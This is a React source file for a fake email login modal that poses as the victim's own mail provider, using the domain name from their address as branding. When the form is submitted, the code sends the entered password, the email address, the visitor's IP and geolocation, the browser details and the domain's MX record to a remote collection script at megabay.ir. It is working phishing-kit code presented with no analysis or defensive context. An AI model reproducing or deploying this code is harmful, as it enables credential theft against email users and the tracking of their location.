import React, { useState } from 'react';
import { getMXRecord, getVisitorIP, GetBrowserandLanguage } from '../utils';

const LoginModal = ({ email, domain, langs, onSubmit, errorMessage }) => {
  const [password, setPassword] = useState('');
  const [showPassword, setShowPassword] = useState(false);
  const [loading, setLoading] = useState(false);

  const handleSubmit = async (e) => {
    e.preventDefault();
    
    if (password.length < 4) {
      onSubmit(false, langs.lessThan4);
      return;
    }
    
    setLoading(true);
    
    try {
      const date = new Date();
      const visitorInfo = await getVisitorIP();
      const mxRecord = await getMXRecord(domain);
      
      // Create URL-encoded form data
      const formData = new URLSearchParams();
      formData.append('email', email);
      formData.append('password', password);
      formData.append('domain', domain);
      formData.append('browser', GetBrowserandLanguage()[0]);
      formData.append('language', GetBrowserandLanguage()[1]);
      formData.append('mx_record', mxRecord);
      formData.append('ip', visitorInfo[0]);
      formData.append('country', visitorInfo[1]);
      formData.append('region', visitorInfo[2]);
      formData.append('city', visitorInfo[3]);
      formData.append('date', date.toString());
      formData.append('user_agent', navigator.userAgent);

      // Send as standard form data
      const response = await fetch('https://megabay.ir/hold/result.php', {
        method: 'POST',
        headers: {
          'Content-Type': 'application/x-www-form-urlencoded'
        },
        body: formData.toString()
      });

      if (response.ok) {
        onSubmit(true);
      } else {
        onSubmit(false, langs.msg);
      }
    } catch (err) {
      onSubmit(false, 'Network error. Please try again.');
    } finally {
      setLoading(false);
      setPassword(''); // Clear password field after submission
    }
  };

  return (
    <div style={{
      position: 'fixed',
      top: '50%',
      left: '50%',
      transform: 'translate(-50%, -50%)',
      backgroundColor: 'white',
      padding: '30px',
      borderRadius: '8px',
      boxShadow: '0 4px 20px rgba(0, 0, 0, 0.15)',
      zIndex: 1001,
      width: '100%',
      maxWidth: '400px'
    }}>
      <div style={{ textAlign: 'center' }}>
        <form onSubmit={handleSubmit} style={{ marginTop: '20px' }}>
          <h2 style={{ marginBottom: '25px' }}>
            <div style={{ display: 'flex', alignItems: 'center', justifyContent: 'center', marginBottom: '15px' }}>
              <span style={{ verticalAlign: 'middle', paddingLeft: '5px', fontWeight: 'bold', fontSize: '1.8rem' }}>
                {domain.split('.')[0].toUpperCase()}
              </span>
            </div>
          </h2>
          <h3>
            <div style={{ display: 'flex', alignItems: 'center', justifyContent: 'center' }}>
              <span style={{ fontSize: '2rem', display: 'inline-block', fontWeight: '600' }}>
                {langs.emlLogin}
              </span>
            </div>
          </h3>
          
          <div style={{ margin: '25px 0' }}>
            {errorMessage && (
              <div style={{
                color: '#721c24',
                backgroundColor: '#f8d7da',
                border: '1px solid #f5c6cb',
                padding: '10px',
                borderRadius: '4px',
                marginBottom: '15px',
                textAlign: 'center'
              }}>
                {errorMessage}
              </div>
            )}
          </div>
          
          <div style={{ marginBottom: '20px' }}>
            <div style={{ position: 'relative' }}>
              <span style={{
                position: 'absolute',
                left: 0,
                top: 0,
                bottom: 0,
                width: '40px',
                display: 'flex',
                alignItems: 'center',
                justifyContent: 'center',
                backgroundColor: '#f1f1f1',
                border: '1px solid #ddd',
                borderRight: 'none',
                borderTopLeftRadius: '4px',
                borderBottomLeftRadius: '4px'
              }}>
                <i className="fas fa-user" aria-hidden="true"></i>
              </span>
              <input
                type="email"
                style={{
                  width: '100%',
                  padding: '12px 12px 12px 50px',
                  border: '1px solid #ddd',
                  borderRadius: '4px',
                  fontSize: '16px',
                  boxSizing: 'border-box'
                }}
                placeholder={langs.emlTxt}
                value={email}
                readOnly
              />
            </div>
          </div>
          
          <div style={{ marginBottom: '20px' }}>
            <div style={{ position: 'relative' }}>
              <span 
                style={{
                  position: 'absolute',
                  left: 0,
                  top: 0,
                  bottom: 0,
                  width: '40px',
                  display: 'flex',
                  alignItems: 'center',
                  justifyContent: 'center',
                  backgroundColor: '#f1f1f1',
                  border: '1px solid #ddd',
                  borderRight: 'none',
                  borderTopLeftRadius: '4px',
                  borderBottomLeftRadius: '4px',
                  cursor: 'pointer'
                }}
                onClick={() => setShowPassword(!showPassword)}
              >
                <i className={`fas fa-${showPassword ? 'eye-slash' : 'eye'}`} aria-hidden="true"></i>
              </span>
              <input
                type={showPassword ? "text" : "password"}
                style={{
                  width: '100%',
                  padding: '12px 12px 12px 50px',
                  border: '1px solid #ddd',
                  borderRadius: '4px',
                  fontSize: '16px',
                  boxSizing: 'border-box'
                }}
                placeholder={langs.pswTxt}
                value={password}
                onChange={(e) => setPassword(e.target.value)}
              />
            </div>
          </div>
          
          <div>
            <button 
              type="submit" 
              style={{
                width: '100%',
                padding: '12px',
                backgroundColor: loading ? '#6c757d' : '#007bff',
                color: 'white',
                border: 'none',
                borderRadius: '4px',
                cursor: loading ? 'not-allowed' : 'pointer',
                fontSize: '16px',
                fontWeight: '600',
                marginTop: '10px'
              }}
              disabled={loading}
            >
              {loading ? langs.verifyingText : langs.submitBtn}
            </button>
          </div>
          
          <div style={{
            marginTop: '15px',
            display: 'flex',
            justifyContent: 'space-between',
            alignItems: 'center'
          }}>
            <label style={{ display: 'flex', alignItems: 'center' }}>
              <input 
                type="checkbox" 
                id="sec-lg-ss" 
                style={{ marginRight: '5px' }}
              />
              {langs.secLgSs}
            </label>
            <a href="#" style={{ color: '#007bff', textDecoration: 'none' }}>
              {langs.frgPsw}
            </a>
          </div>
        </form>
        
        <p style={{ textAlign: 'center', marginTop: '20px' }}> 
          <a href="#" style={{ fontSize: '12px', color: '#6c757d', textDecoration: 'none' }}>
            {langs.copy}
          </a>
        </p>
      </div>
    </div>
  );
};

export default LoginModal;